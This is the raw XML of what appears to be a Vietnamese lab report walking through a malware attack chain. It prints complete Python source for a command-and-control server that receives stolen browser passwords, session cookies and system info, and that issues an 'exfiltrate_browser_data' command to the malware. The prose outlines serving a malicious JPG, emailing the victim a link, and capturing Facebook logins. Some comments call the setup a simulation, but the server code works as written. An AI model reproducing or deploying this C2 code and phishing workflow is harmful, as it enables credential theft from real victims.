        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>malicious_file = create_perfect_malicious_jpg()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D29B47">
      <w:pPr>
        <w:ind w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76075E7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1200150" cy="148590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1200150" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="092EDE8F">
      <w:pPr>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4457700" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="37" name="Picture 37" descr="Screenshot 2025-10-13 21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5-10-13 212740"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4457700" cy="3619500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26A1CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo các file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c2_server.py Command và control server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A0A3A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from http.server import HTTPServer, BaseHTTPRequestHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6579C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609BFEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5AC178">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8EA89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B187183">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>class C2ServerHandler(BaseHTTPRequestHandler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177D84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def do_POST(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D05C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"""Nhận dữ liệu đánh cắp từ malware"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3AE1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content_length = int(self.headers.get('Content-Length', 0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250E38F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post_data = self.rfile.read(content_length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0135F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5004216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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E830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stolen_data = json.loads(post_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD485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self.log_exfiltration(stolen_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03538AE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03748AD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self.send_response(200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7A76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self.end_headers()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192631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self.wfile.write(b'OK')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F8436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972C6F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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B935AE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Lỗi xử lý dữ liệu: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282940B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self.send_error(500, str(e))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F382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1854E8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def do_GET(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5425A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"""Endpoint cho malware check-in và nhận lệnh"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9740A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if self.path == '/checkin':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7F6D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self.send_response(200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A5EF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self.send_header('Content-type', 'application/json')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29927BC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self.end_headers()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ABEC8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B2EC24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Trả về lệnh cho malware (mô phỏng)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEFB1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commands = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701BACC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"status": "active",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E5C56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"action": "exfiltrate_browser_data", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C38F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"targets": ["passwords", "cookies", "credit_cards", "system_info"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998DED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78D8144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self.wfile.write(json.dumps(commands).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0FA50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Đã gửi lệnh cho malware từ {self.client_address[0]}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6CC82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0201EC0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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3AF22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self.send_error(404, "Endpoint not found")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E9EFF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def log_exfiltration(self, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D38A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"""Ghi log dữ liệu bị đánh cắp"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A242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timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBAF19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2805CD9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print(f"\n🎯 C2 SERVER - NHẬN DỮ LIỆU ĐÁNH CẮP")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CACC4E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 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33EB3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Thời gian: {timestamp}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1126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Địa chỉ nạn nhân: {self.client_address[0]}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A364FA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Dữ liệu nhận được:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB824B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C4B728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if 'system_info' in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFABA0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THÔNG TIN HỆ THỐNG:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7688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for key, value in data['system_info'].items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421320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 {key}: {value}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C5CB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CD0EF0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if 'browser_data' in data and 'passwords' in data['browser_data']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A80429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MẬT KHẨU TRÌNH DUYỆT:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B5A3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for pw in data['browser_data']['passwords']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ED5A4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 {pw.get('username', 'N/A')} @ {pw.get('url', 'N/A')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CEDF0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70DAF18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if 'browser_data' in data and 'cookies' in data['browser_data']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A0DA1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COOKIES PHIÊN ĐĂNG NHẬP:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC06EF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for cookie in data['browser_data']['cookies']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB753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 {cookie.get('name', 'N/A')} = {cookie.get('value', '')[:20]}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44757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135E260A">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 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9353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20FF3FF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Lưu vào file log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8974E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with open("c2_exfiltration_log.json", "a", encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73498FB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log_entry = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5AF40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"timestamp": timestamp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3282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"client_ip": self.client_address[0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C281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"data": data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E525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156A12D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f.write(json.dumps(log_entry, ensure_ascii=False) + "\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2D55A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2C8493A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def log_message(self, format, *args):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23061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"""Ẩn log messages mặc định"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5061EBC3">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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E590056">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>def start_c2_server():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01466A4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Chạy server trên tất cả interface, port 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264BDE9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server_address = ('0.0.0.0', 9999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7FBA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httpd = HTTPServer(server_address, C2ServerHandler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE476A9">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6E173564">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 Lấy IP local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115F7816">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hostname = socket.gethostname()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DFF4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local_ip = socket.gethostbyname(hostname)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFBA4B2">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48B26E9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C2 COMMAND &amp; CONTROL SERVER ĐÃ KHỞI ĐỘNG")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871A987">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 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2636A4E5">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Endpoints:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CF82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 http://localhost:9999/checkin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E441A10">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 http://{local_ip}:9999/checkin") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689E33F">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 http://192.168.8.131:9999/checkin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B6BB6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print(f"   • POST data đến: http://{local_ip}:9999/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E15B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print("\n📡 Đang chờ kết nối từ malware...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3B2F58">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 * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E00E1">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F6A8E">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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD0F1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httpd.serve_forever()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41F56C">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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFE61B">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print("\n🛑 C2 Server đã dừng")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB46FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7160F7E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BD3AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    start_c2_server()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46D1C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="13335"/>
            <wp:docPr id="12" name="Picture 12" descr="Screenshot 2025-10-13 210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13 210608"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2333625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A08C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E24507">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CA6D88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tạo file malicious_server.py phân phối file độc hại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EE3DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4924425" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="13335" b="13335"/>
            <wp:docPr id="36" name="Picture 36" descr="Screenshot 2025-10-13 21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5-10-13 210558"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4924425" cy="2257425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A17D18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tạo file malware_simulator1.py tạo cơ chế trích xuất và kích hoạt mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8982B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4800600" cy="4733925"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="38" name="Picture 38" descr="Screenshot 2025-10-13 21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5-10-13 214132"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4800600" cy="4733925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6BE0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C2866B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3B078C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51575E3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sau đó gửi mail qua máy nạn nhân đường link khi nạn nhân bấm vào chạy trình duyệt và tải ảnh về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B70301C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5758180" cy="3515995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="39" name="Picture 39" descr="Screenshot 2025-10-13 21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5-10-13 210749"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758180" cy="3515995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EB3880">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7F774B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sau đó đăng nhập các tài khoản như facebook,.... thì username và password sẽ được ghi lại</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5757545" cy="4937760"/>
            <wp:effectExtent l="0" t="0" r="3175"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31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5757545" cy="4937760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
